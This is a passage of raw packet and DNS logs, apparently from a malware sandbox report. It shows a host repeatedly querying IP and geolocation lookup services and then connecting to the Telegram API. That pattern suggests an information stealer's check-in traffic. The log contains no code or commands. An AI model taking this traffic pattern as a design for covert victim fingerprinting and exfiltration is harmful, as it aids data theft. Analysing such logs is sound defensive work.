                                                Sep 26, 2024 09:25:36.499712944 CEST4917680192.168.2.22193.122.6.168
                                                Sep 26, 2024 09:25:36.499825001 CEST4917680192.168.2.22193.122.6.168
                                                Sep 26, 2024 09:25:36.504606962 CEST8049176193.122.6.168192.168.2.22
                                                Sep 26, 2024 09:25:38.126357079 CEST8049176193.122.6.168192.168.2.22
                                                Sep 26, 2024 09:25:38.153688908 CEST49177443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:38.153743982 CEST44349177188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:38.153810024 CEST49177443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:38.157363892 CEST49177443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:38.157387018 CEST44349177188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:38.331623077 CEST8049176193.122.6.168192.168.2.22
                                                Sep 26, 2024 09:25:38.331749916 CEST4917680192.168.2.22193.122.6.168
                                                Sep 26, 2024 09:25:38.622514009 CEST44349177188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:38.697935104 CEST49177443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:38.697951078 CEST44349177188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:38.804380894 CEST44349177188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:38.804486990 CEST44349177188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:38.804552078 CEST49177443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:38.811044931 CEST49177443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:38.855915070 CEST4917680192.168.2.22193.122.6.168
                                                Sep 26, 2024 09:25:38.861099958 CEST8049176193.122.6.168192.168.2.22
                                                Sep 26, 2024 09:25:38.861193895 CEST4917680192.168.2.22193.122.6.168
                                                Sep 26, 2024 09:25:39.009927034 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:25:39.009968042 CEST44349178149.154.167.220192.168.2.22
                                                Sep 26, 2024 09:25:39.010039091 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:25:39.043796062 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:25:39.043816090 CEST44349178149.154.167.220192.168.2.22
                                                Sep 26, 2024 09:25:39.662944078 CEST44349178149.154.167.220192.168.2.22
                                                Sep 26, 2024 09:25:39.663057089 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:25:40.099841118 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:25:40.099864006 CEST44349178149.154.167.220192.168.2.22
                                                Sep 26, 2024 09:25:40.100308895 CEST44349178149.154.167.220192.168.2.22
                                                Sep 26, 2024 09:25:40.307152987 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:25:40.337202072 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:25:40.383407116 CEST44349178149.154.167.220192.168.2.22
                                                Sep 26, 2024 09:25:40.509454966 CEST44349178149.154.167.220192.168.2.22
                                                Sep 26, 2024 09:25:40.509542942 CEST44349178149.154.167.220192.168.2.22
                                                Sep 26, 2024 09:25:40.509625912 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:25:40.873872995 CEST49178443192.168.2.22149.154.167.220
                                                Sep 26, 2024 09:26:22.788729906 CEST8049167193.122.130.0192.168.2.22
                                                Sep 26, 2024 09:26:22.788949966 CEST4916780192.168.2.22193.122.130.0

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 26, 2024 09:25:06.119144917 CEST5456253192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:06.125633001 CEST53545628.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:06.157207012 CEST5291753192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:06.163969040 CEST53529178.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:10.667587996 CEST6275153192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:10.678983927 CEST53627518.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:12.519568920 CEST5789353192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:12.526087046 CEST53578938.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:12.528458118 CEST5482153192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:12.534842014 CEST53548218.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:17.818219900 CEST5471953192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:17.824685097 CEST53547198.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:17.827104092 CEST4988153192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:17.833628893 CEST53498818.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:23.103169918 CEST5499853192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:23.113462925 CEST53549988.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:23.806372881 CEST5278153192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:23.812717915 CEST53527818.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:23.817070007 CEST6392653192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:23.823535919 CEST53639268.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:26.970077991 CEST6551053192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:26.977129936 CEST53655108.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:28.715007067 CEST6267253192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:28.723254919 CEST53626728.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:28.723474979 CEST6267253192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:28.729842901 CEST53626728.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:28.736088037 CEST5647553192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:28.742240906 CEST53564758.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:29.332583904 CEST4938453192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:29.342540026 CEST53493848.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:29.342761040 CEST4938453192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:29.349888086 CEST53493848.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:30.048943043 CEST5484253192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:30.055340052 CEST53548428.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:30.057316065 CEST5810553192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:30.063704014 CEST53581058.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:32.007271051 CEST6492853192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:32.013824940 CEST53649288.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:32.014405966 CEST6492853192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:32.021083117 CEST53649288.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:32.047249079 CEST5739053192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:32.053826094 CEST53573908.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:36.387377024 CEST5809553192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:36.393940926 CEST53580958.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:36.405407906 CEST5426153192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:36.412592888 CEST53542618.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:36.418224096 CEST5426153192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:36.424607992 CEST53542618.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:38.135828018 CEST6050753192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:38.147402048 CEST53605078.8.8.8192.168.2.22
                                                Sep 26, 2024 09:25:39.002331972 CEST5044653192.168.2.228.8.8.8
                                                Sep 26, 2024 09:25:39.008960962 CEST53504468.8.8.8192.168.2.22

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Sep 26, 2024 09:25:06.119144917 CEST192.168.2.228.8.8.80x4516Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:06.157207012 CEST192.168.2.228.8.8.80x7df6Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:10.667587996 CEST192.168.2.228.8.8.80x659Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:12.519568920 CEST192.168.2.228.8.8.80x4ca0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:12.528458118 CEST192.168.2.228.8.8.80x4f79Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:17.818219900 CEST192.168.2.228.8.8.80x8646Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:17.827104092 CEST192.168.2.228.8.8.80xa5d9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.103169918 CEST192.168.2.228.8.8.80x2c96Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.806372881 CEST192.168.2.228.8.8.80xbf10Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.817070007 CEST192.168.2.228.8.8.80x8b05Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:26.970077991 CEST192.168.2.228.8.8.80xebafStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.715007067 CEST192.168.2.228.8.8.80xcb9aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.723474979 CEST192.168.2.228.8.8.80xcb9aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.736088037 CEST192.168.2.228.8.8.80xdb8eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:29.332583904 CEST192.168.2.228.8.8.80x91aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:29.342761040 CEST192.168.2.228.8.8.80x91aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:30.048943043 CEST192.168.2.228.8.8.80x6034Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:30.057316065 CEST192.168.2.228.8.8.80x86dbStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.007271051 CEST192.168.2.228.8.8.80x364bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.014405966 CEST192.168.2.228.8.8.80x364bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.047249079 CEST192.168.2.228.8.8.80x681fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.387377024 CEST192.168.2.228.8.8.80xfb7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.405407906 CEST192.168.2.228.8.8.80xe7aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:36.418224096 CEST192.168.2.228.8.8.80xe7aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:38.135828018 CEST192.168.2.228.8.8.80xec33Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:39.002331972 CEST192.168.2.228.8.8.80xc07cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Sep 26, 2024 09:25:06.125633001 CEST8.8.8.8192.168.2.220x4516No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:06.125633001 CEST8.8.8.8192.168.2.220x4516No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:06.125633001 CEST8.8.8.8192.168.2.220x4516No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:06.125633001 CEST8.8.8.8192.168.2.220x4516No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:06.125633001 CEST8.8.8.8192.168.2.220x4516No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:06.125633001 CEST8.8.8.8192.168.2.220x4516No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:06.163969040 CEST8.8.8.8192.168.2.220x7df6No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:06.163969040 CEST8.8.8.8192.168.2.220x7df6No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:06.163969040 CEST8.8.8.8192.168.2.220x7df6No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:06.163969040 CEST8.8.8.8192.168.2.220x7df6No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:06.163969040 CEST8.8.8.8192.168.2.220x7df6No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:06.163969040 CEST8.8.8.8192.168.2.220x7df6No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:10.678983927 CEST8.8.8.8192.168.2.220x659No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:10.678983927 CEST8.8.8.8192.168.2.220x659No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:12.526087046 CEST8.8.8.8192.168.2.220x4ca0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:12.526087046 CEST8.8.8.8192.168.2.220x4ca0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:12.526087046 CEST8.8.8.8192.168.2.220x4ca0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:12.526087046 CEST8.8.8.8192.168.2.220x4ca0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:12.526087046 CEST8.8.8.8192.168.2.220x4ca0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:12.526087046 CEST8.8.8.8192.168.2.220x4ca0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:12.534842014 CEST8.8.8.8192.168.2.220x4f79No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:12.534842014 CEST8.8.8.8192.168.2.220x4f79No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:12.534842014 CEST8.8.8.8192.168.2.220x4f79No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:12.534842014 CEST8.8.8.8192.168.2.220x4f79No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:12.534842014 CEST8.8.8.8192.168.2.220x4f79No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:12.534842014 CEST8.8.8.8192.168.2.220x4f79No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:17.824685097 CEST8.8.8.8192.168.2.220x8646No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:17.824685097 CEST8.8.8.8192.168.2.220x8646No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:17.824685097 CEST8.8.8.8192.168.2.220x8646No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:17.824685097 CEST8.8.8.8192.168.2.220x8646No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:17.824685097 CEST8.8.8.8192.168.2.220x8646No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:17.824685097 CEST8.8.8.8192.168.2.220x8646No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:17.833628893 CEST8.8.8.8192.168.2.220xa5d9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:17.833628893 CEST8.8.8.8192.168.2.220xa5d9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:17.833628893 CEST8.8.8.8192.168.2.220xa5d9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:17.833628893 CEST8.8.8.8192.168.2.220xa5d9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:17.833628893 CEST8.8.8.8192.168.2.220xa5d9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:17.833628893 CEST8.8.8.8192.168.2.220xa5d9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.113462925 CEST8.8.8.8192.168.2.220x2c96No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.113462925 CEST8.8.8.8192.168.2.220x2c96No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.812717915 CEST8.8.8.8192.168.2.220xbf10No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.812717915 CEST8.8.8.8192.168.2.220xbf10No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.812717915 CEST8.8.8.8192.168.2.220xbf10No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.812717915 CEST8.8.8.8192.168.2.220xbf10No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.812717915 CEST8.8.8.8192.168.2.220xbf10No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.812717915 CEST8.8.8.8192.168.2.220xbf10No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.823535919 CEST8.8.8.8192.168.2.220x8b05No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.823535919 CEST8.8.8.8192.168.2.220x8b05No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.823535919 CEST8.8.8.8192.168.2.220x8b05No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.823535919 CEST8.8.8.8192.168.2.220x8b05No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.823535919 CEST8.8.8.8192.168.2.220x8b05No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:23.823535919 CEST8.8.8.8192.168.2.220x8b05No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:26.977129936 CEST8.8.8.8192.168.2.220xebafNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:26.977129936 CEST8.8.8.8192.168.2.220xebafNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.723254919 CEST8.8.8.8192.168.2.220xcb9aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.723254919 CEST8.8.8.8192.168.2.220xcb9aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.723254919 CEST8.8.8.8192.168.2.220xcb9aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.723254919 CEST8.8.8.8192.168.2.220xcb9aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.723254919 CEST8.8.8.8192.168.2.220xcb9aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.723254919 CEST8.8.8.8192.168.2.220xcb9aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.729842901 CEST8.8.8.8192.168.2.220xcb9aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.729842901 CEST8.8.8.8192.168.2.220xcb9aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.729842901 CEST8.8.8.8192.168.2.220xcb9aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.729842901 CEST8.8.8.8192.168.2.220xcb9aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.729842901 CEST8.8.8.8192.168.2.220xcb9aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.729842901 CEST8.8.8.8192.168.2.220xcb9aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.742240906 CEST8.8.8.8192.168.2.220xdb8eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.742240906 CEST8.8.8.8192.168.2.220xdb8eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.742240906 CEST8.8.8.8192.168.2.220xdb8eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.742240906 CEST8.8.8.8192.168.2.220xdb8eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.742240906 CEST8.8.8.8192.168.2.220xdb8eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:28.742240906 CEST8.8.8.8192.168.2.220xdb8eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:29.342540026 CEST8.8.8.8192.168.2.220x91aNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:29.342540026 CEST8.8.8.8192.168.2.220x91aNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:29.349888086 CEST8.8.8.8192.168.2.220x91aNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:29.349888086 CEST8.8.8.8192.168.2.220x91aNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:30.055340052 CEST8.8.8.8192.168.2.220x6034No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:30.055340052 CEST8.8.8.8192.168.2.220x6034No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:30.055340052 CEST8.8.8.8192.168.2.220x6034No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:30.055340052 CEST8.8.8.8192.168.2.220x6034No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:30.055340052 CEST8.8.8.8192.168.2.220x6034No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:30.055340052 CEST8.8.8.8192.168.2.220x6034No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:30.063704014 CEST8.8.8.8192.168.2.220x86dbNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:30.063704014 CEST8.8.8.8192.168.2.220x86dbNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:30.063704014 CEST8.8.8.8192.168.2.220x86dbNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:30.063704014 CEST8.8.8.8192.168.2.220x86dbNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:30.063704014 CEST8.8.8.8192.168.2.220x86dbNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:30.063704014 CEST8.8.8.8192.168.2.220x86dbNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.013824940 CEST8.8.8.8192.168.2.220x364bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.013824940 CEST8.8.8.8192.168.2.220x364bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.013824940 CEST8.8.8.8192.168.2.220x364bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.013824940 CEST8.8.8.8192.168.2.220x364bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.013824940 CEST8.8.8.8192.168.2.220x364bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.013824940 CEST8.8.8.8192.168.2.220x364bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.021083117 CEST8.8.8.8192.168.2.220x364bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.021083117 CEST8.8.8.8192.168.2.220x364bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.021083117 CEST8.8.8.8192.168.2.220x364bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.021083117 CEST8.8.8.8192.168.2.220x364bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.021083117 CEST8.8.8.8192.168.2.220x364bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.021083117 CEST8.8.8.8192.168.2.220x364bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.053826094 CEST8.8.8.8192.168.2.220x681fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.053826094 CEST8.8.8.8192.168.2.220x681fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.053826094 CEST8.8.8.8192.168.2.220x681fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.053826094 CEST8.8.8.8192.168.2.220x681fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 09:25:32.053826094 CEST8.8.8.8192.168.2.220x681fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
